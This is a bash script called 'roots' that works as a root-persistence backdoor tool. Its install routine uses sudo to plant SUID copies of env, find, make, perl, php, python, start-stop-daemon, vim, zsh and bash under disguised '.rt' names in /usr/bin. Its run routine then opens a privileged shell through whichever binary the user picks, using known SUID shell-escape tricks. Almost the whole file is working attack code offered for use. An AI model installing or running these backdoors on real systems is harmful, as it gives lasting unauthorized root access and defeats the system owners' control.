#!/bin/bash
#Lots of SUID commands all in one usage :)

ARGS1=$1
ARGS2=$2
function install {
	#Inital
	cp ./roots /bin/roots #this will allow it to be run normally later without the repo	

	#ENV
	apt-get install env 2&>/dev/null
	yum install env 2&>dev/null
	sudo sh -c 'cp $(which env) .; chmod +s ./env'
	mv ./env /usr/bin/env.rt

	#FIND
	apt-get install -y find 2&>/dev/null
	yum install -y find 2&>/dev/null
	sudo sh -c 'cp $(which find) .; chmod +s ./find'
	mv ./find /usr/bin/find.rt
	
	#MAKE
	apt-get install -y make 2&>/dev/null
	yum install -y make 2&>/dev/null
	sudo sh -c 'cp $(which make) .; chmod +s ./make'
	mv ./make /usr/bin/make.rt

	#PERL
	apt-get install -y perl 2&>/dev/null
	yum install -y perl 2&>/dev/null
	sudo sh -c 'cp $(which perl) .; chmod +s ./perl'
	mv ./perl /usr/bin/perl.rt

	#PHP
	apt-get install -y php 2&>/dev/null
        yum install -y php 2&>/dev/null
	sudo sh -c 'cp $(which php) .; chmod +s ./php'
	mv ./php /usr/bin/php.rt

	#PYTHON
	apt-get install -y python 2&>/dev/null
	yum install -y python 2&>/dev/null
	sudo sh -c 'cp $(which python) .; chmod +s ./python'
	mv ./python /usr/bin/python.rt
	
	#DAEMON
	apt-get install -y start-stop-daemon 2&>/dev/null
        yum install -y start-stop-daemon 2&>/dev/null
	sudo sh -c 'cp $(which start-stop-daemon) .; chmod +s ./start-stop-daemon'
	mv ./start-stop-daemon /usr/bin/daemon.rt	

	#VIM
	apt-get install -y vim 2&>/dev/null
        yum install -y vim 2&>/dev/null
	sudo sh -c 'cp $(which vim) .; chmod +s ./vim'
	mv ./vim /usr/bin/vim.rt

	#ZSH
	apt-get install -y zsh 2&>/dev/null
        yum install -y zsh 2&>/dev/null
	sudo sh -c 'cp $(which zsh) .; chmod +s ./zsh'
	mv ./zsh /usr/bin/zsh.rt

	#BASH
	apt-get install -y bash 2&>/dev/null
        yum install -y bash 2&>/dev/null
	sudo sh -c 'cp $(which bash) .; chmod +s ./bash'
	mv ./bash /usr/bin/bash.rt	
}

function run {
	if [ "$ARGS2" == "env" ];then
		/usr/bin/env.rt /bin/sh -p
	elif [ "$ARGS2" == "find" ];then
		/usr/bin/find.rt . -exec /bin/sh -p \; -quit
	elif [ "$ARGS2" == "make" ];then
		/usr/bin/make.rt -s --eval=$'x:\n\t-'"/bin/sh -p"
	elif [ "$ARGS2" == "perl" ];then
		/usr/bin/perl.rt -e 'exec "/bin/sh";'
	elif [ "$ARGS2" == "php" ];then
		/usr/bin/php.rt -r "pcntl_exec('/bin/sh', ['-p']);"
	elif [ "$ARGS2" == "python" ];then
		/usr/bin/python.rt -c 'import os; os.execl("/bin/sh", "sh", "-p")'
	elif [ "$ARGS2" == "daemon" ];then
		/usr/bin/daemon.rt -n $RANDOM -S -x /bin/sh -- -p
	elif [ "$ARGS2" == "vim" ];then
		/usr/bin/vim.rt -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
	elif [ "$ARGS2" == "zsh" ];then
		/usr/bin/zsh.rt
	elif [ "$ARGS2" == "bash" ];then
		/usr/bin/bash.rt -p
	fi
}

if [ "$ARGS1" == "--install" ];then
	install
elif [ "$ARGS1" == "--run" ];then
	run
else
	echo "Welcome to ALL THE ROOTS :)"
	echo ""
	echo "Commands include: bash, zsh, env, find, make, perl, php, python, daemon, vim"
	echo ""
	echo "Usage is ./roots --????"
	echo ""
	echo "Ex: ./roots --install"
	echo ""
	echo "Ex: ./roots --run ????"
	echo "Ex: ./roots --run find"
	echo "Ex: ./roots --run env"
fi
